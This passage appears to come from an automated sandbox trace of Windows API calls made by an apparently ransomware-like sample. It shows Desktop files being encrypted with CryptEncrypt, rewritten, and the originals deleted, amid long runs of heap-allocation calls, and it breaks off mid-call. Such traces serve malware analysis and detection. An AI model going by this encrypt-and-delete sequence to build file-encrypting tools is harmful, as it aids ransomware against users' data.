lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0125.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0125.349] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49c34e0*, pdwDataLen=0x144e790*=0x86e3, dwBufLen=0x86f0 | out: pbData=0x49c34e0*, pdwDataLen=0x144e790*=0x86f0) returned 1 [0125.349] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0125.349] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0125.349] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.349] WriteFile (in: hFile=0x258, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0x86f0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144f194*=0x86f0, lpOverlapped=0x0) returned 1 [0125.351] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0125.351] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.351] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0125.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca790, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0125.352] CryptDestroyKey (hKey=0x41ac2c0) returned 1 [0125.352] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0125.352] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0125.352] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.352] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0125.365] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0125.365] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.365] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.365] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0125.365] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0125.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0125.365] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0125.365] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.365] FreeLibrary (hLibModule=0x756e0000) returned 1 [0125.365] CloseHandle (hObject=0x2a0) returned 1 [0125.365] CloseHandle (hObject=0x258) returned 1 [0125.369] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\OD9hoNYV uW0IIj2du.bmp", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\OD9hoNYV uW0IIj2du.bmp", lpFilePart=0x0) returned 0x2e [0125.369] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\OD9hoNYV uW0IIj2du.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\od9honyv uw0iij2du.bmp")) returned 0x20 [0125.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0125.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0125.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0125.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359ad0 | out: hHeap=0x1780000) returned 1 [0125.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0125.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0125.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0125.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392618 | out: hHeap=0x1780000) returned 1 [0125.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0125.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920d8 | out: hHeap=0x1780000) returned 1 [0125.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0125.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0125.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0125.370] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\OD9hoNYV uW0IIj2du.bmp", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14423090, ftCreationTime.dwHighDateTime=0x1d5e5ae, ftLastAccessTime.dwLowDateTime=0xf27c3430, ftLastAccessTime.dwHighDateTime=0x1d5e3cb, ftLastWriteTime.dwLowDateTime=0xf27c3430, ftLastWriteTime.dwHighDateTime=0x1d5e3cb, nFileSizeHigh=0x0, nFileSizeLow=0x86e3, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="OD9hoNYV uW0IIj2du.bmp", cAlternateFileName="OD9HON~1.BMP")) returned 0x41ac500 [0125.370] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\OD9hoNYV uW0IIj2du.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\od9honyv uw0iij2du.bmp")) returned 1 [0125.377] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14423090, ftCreationTime.dwHighDateTime=0x1d5e5ae, ftLastAccessTime.dwLowDateTime=0xf27c3430, ftLastAccessTime.dwHighDateTime=0x1d5e3cb, ftLastWriteTime.dwLowDateTime=0xf27c3430, ftLastWriteTime.dwHighDateTime=0x1d5e3cb, nFileSizeHigh=0x0, nFileSizeLow=0x86e3, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="OD9hoNYV uW0IIj2du.bmp", cAlternateFileName="OD9HON~1.BMP")) returned 0 [0125.377] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0125.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392650 | out: hHeap=0x1780000) returned 1 [0125.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0125.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0125.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0125.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0125.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0125.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0125.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0125.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0125.378] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0125.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0125.378] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0125.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0125.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0125.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0125.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0125.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0125.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0125.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0125.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0125.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0125.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0125.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0125.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0125.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0125.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0125.378] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0125.378] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0125.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0125.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0125.379] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0125.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0125.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0125.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0125.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22c0 [0125.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0125.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0125.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0125.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0125.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0125.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0125.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0125.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0125.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0125.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0125.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0125.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0125.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0125.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42da070 [0125.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0125.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0125.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0125.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0125.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0125.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9950 [0125.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0125.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0125.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0125.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0125.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0125.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0125.380] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0125.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0125.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0125.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0125.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0125.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0125.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0125.380] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0125.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0125.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0125.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0125.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0125.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0125.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0125.381] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\oIFaH-1_nryv.mp3", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba8245c0, ftCreationTime.dwHighDateTime=0x1d5f04f, ftLastAccessTime.dwLowDateTime=0x246b8b00, ftLastAccessTime.dwHighDateTime=0x1d5e497, ftLastWriteTime.dwLowDateTime=0x246b8b00, ftLastWriteTime.dwHighDateTime=0x1d5e497, nFileSizeHigh=0x0, nFileSizeLow=0xdbcb, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="oIFaH-1_nryv.mp3", cAlternateFileName="OIFAH-~1.MP3")) returned 0x41ac100 [0125.381] FindClose (in: hFindFile=0x41ac100 | out: hFindFile=0x41ac100) returned 1 [0125.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0125.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0125.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0125.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0125.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0125.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0125.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921f0 [0125.381] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0125.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921f0 | out: hHeap=0x1780000) returned 1 [0125.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0125.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0125.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2160 [0125.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0125.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0125.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0125.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0125.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0125.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9bd8 [0125.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0125.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0125.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0125.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0125.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0125.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0125.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0125.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0125.382] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0125.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0125.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0125.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0125.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0125.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0125.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0125.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0125.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0125.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0125.383] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0125.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920a0 | out: hHeap=0x1780000) returned 1 [0125.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0125.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0125.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2150 [0125.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0125.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0125.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0125.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0125.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0125.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21f0 [0125.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0125.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0125.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0125.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0125.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0125.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0125.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0125.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9b90 [0125.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0125.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0125.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0125.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0125.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0125.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0125.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0125.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0125.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0125.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0125.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0125.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0125.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0125.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0125.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0125.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0125.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0125.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0125.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0125.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0125.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0125.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0125.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0125.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0125.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0125.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0125.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0125.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0125.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392570 [0125.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0125.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0125.385] HeapFree (in: 